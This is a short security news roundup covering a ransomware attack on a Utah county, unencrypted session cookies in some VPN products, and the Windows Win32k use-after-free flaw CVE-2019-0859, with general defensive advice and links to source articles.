This week’s security snacks:
- Ransomware, Still Making Headlines and Leaving Tears
- Virtual Not-So-Private Network
- Use After Free Vulnerability – Another Powershell Fileless Attack and the New Urgent Windows CVE
Ransomware, Still Making Headlines and Leaving Tears
Garfield County, Utah, becomes the latest local government to be hit in the US by the scourge that is ransomware.
Unfortunately, most of us will know or will know someone who has been impacted by ransomware—maybe even a relative. The number of incidents does seem to be on the decline, however, this could be simply down to a lack of disclosure that such an incident occurred in the first place. Garfield County found their IT systems in this precarious situation earlier this year, with some details emerging now.
In what is a continuing trend, local governments, hospitals, and police departments have been falling prey to what appear to be targeted attacks. In this incident, the county paid over the ransom in order to regain access to their files. No details on the cost to the county have been disclosed. However, in a separate incident in Jackson County, Georgia, the local county ended up paying over a reported $400K for the privilege.
The advice out there is both simple and complex, depending on how you look at it. It boils down to local endpoint security, user education, advanced threat detection, application of security baselines, patch management and most importantly, and a backup solution that cannot be compromised locally.
Having firsthand witness of SamSam attacks in the past, I can tell you it is not a pretty sight when everything has a bitcoin demand on the screen. Ramp up protection, patch systems, and test your backup/restore processes.
More information on the Utah incident can be in Security Week in this article titled, Utah County Struck by Ransomware.
Virtual Not-So-Private Network
US Department of Homeland Security (DHS) cyber security team revealed a failure of VPN providers to ensure that their cookies are encrypted. This failure creates a massive hole in security.
We have all seen the adverts on TV promising enhanced security when on public WiFi. Most of us have used a VPN at one point or the other, typically connect back to the office. VPN’s have been around for many years and of course are meant to be fundamentally safe, offering a secured encrypted means of connecting to the file server, an internal app, and other internal companies’ resources. But what happens when your VPN service provider fails to encrypt your session cookies? Oops.
This issue of unencrypted session cookies has been discovered for a number of manufacturers / service providers. What does this mean? Well basically if the user’s account becomes compromised, and a hacker obtains this information, they could potentially simply replay the session details. This would allow them to gain access to the protected resources, and best of all, all in your name.
Several manufacturers have moved to address this issue, so the suggestion is you check your firmware revisions and settings to ensure your virtual private network, does not become a virtual public network.
The Register have more information on this in their article from The Register with a rather long title, US-Cert alert! Thanks to a massive bug, VPN now stands for ‘Vigorously Pwned Nodes’.
Use after Free Vulnerability – Another Powershell Fileless Attack and the New Urgent Windows CVE
Another snack, another patch. CVE-2019-0859 outlines details of a security issue being called “use after free vulnerability”, allowing full control of your system.
Patched this month, Microsoft’s designated CVE-2019-0859 security notice outlines a process being used in the wild to gain full remote control to an infected system. The process starts with a memory hook and a function ID contained within the Win32k.sys. The vulnerability allows for control over an allocated memory block. Following this, an exploit can launch a two-state PowerShell attack, with a PowerShell script being downloaded from Pastebin.
Once the PowerShell scripts have run, a fully functional HTTP based shell is established, offering full control of the compromised system. This is of course not the first time we have seen PowerShell being used in this style of fileless attack. Security firms are estimating four figure growth over attacks seen in 2017.
For more information in the securelist.com article titled, New zero-day vulnerability CVE-2019-0859 in win32k.sys.